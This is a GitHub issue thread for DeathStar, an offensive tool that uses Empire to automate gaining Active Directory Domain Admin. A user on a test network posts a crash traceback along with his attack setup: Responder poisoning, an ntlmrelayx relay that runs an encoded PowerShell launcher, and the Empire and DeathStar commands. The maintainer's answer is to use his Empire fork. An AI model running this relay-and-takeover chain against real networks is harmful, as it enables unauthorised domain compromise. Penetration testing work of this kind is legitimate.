search

byt3bl33d3r / DeathStar

Uses Empire's (https://github.com/BC-SECURITY/Empire) RESTful API to automate gaining Domain and/or Enterprise Admin rights in Active Directory environments using some of the most common offensive TTPs.
GNU General Public License v3.0
1.58k stars 329 forks source link

DeathStar Dies on New Agent #14

Closed siesta888 closed 7 years ago

siesta888 commented 7 years ago

I'm trying to setup the following on a test network as per your tutorials on your site: https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html

PLUS

https://byt3bl33d3r.github.io/automating-the-empire-with-the-death-star-getting-domain-admin-with-a-push-of-a-button.html

My setup:

  1. python Responder.py -d -r -f -w -F -P -I eth0
  2. ntlmrelayx -tf targets.txt -c "powershell -noP -sta -w 1 -enc powershell code here"
  3. ./empire --rest --username username --password password
  4. ./Deathstar.py -u username -p password

I can get a new agent by copying in the DeathStar launcher powershell command, and Deathstar sees the new Agent but then it dies shortly thereafter. Error message posted below.

[+] New Agent => Name: BDHZE51L IP: 1.2.3.4 HostName: SB-W7-2 UserName: REDACTED HighIntegrity: 1
Exception in thread Thread-2:
Traceback (most recent call last):
  File "/usr/lib/python3.5/threading.py", line 914, in _bootstrap_inner
    self.run()
  File "./DeathStar.py", line 59, in __run
    self.__run_backup()
  File "/usr/lib/python3.5/threading.py", line 862, in run
    self._target(*self._args, **self._kwargs)
  File "./DeathStar.py", line 538, in pwn_the_shit_out_of_everything
    for user in get_loggedon(agent_name):
  File "./DeathStar.py", line 364, in get_loggedon
    results = execute_module_with_results('powershell/situational_awareness/network/powerview/get_loggedon', agent_name, module_options)
  File "./DeathStar.py", line 170, in execute_module_with_results
    if result['taskID'] == r['taskID']:
KeyError: 'taskID'

Any idea what the issue could be? After that error Empire just hangs and doesn't do anything else.

Target is a Windows 7 Enterprise machine.

byt3bl33d3r commented 7 years ago

You don't seem to be using my fork of empire as it says in the readme file and the article

byt3bl33d3r commented 7 years ago

The PR i mentioned has been merged but the changes haven't been pushed to the master branch. So you can now either use Empire's dev branch or my fork. Cheers

siesta888 commented 7 years ago

Gah! You're right. I should have RTFM more. Thanks much.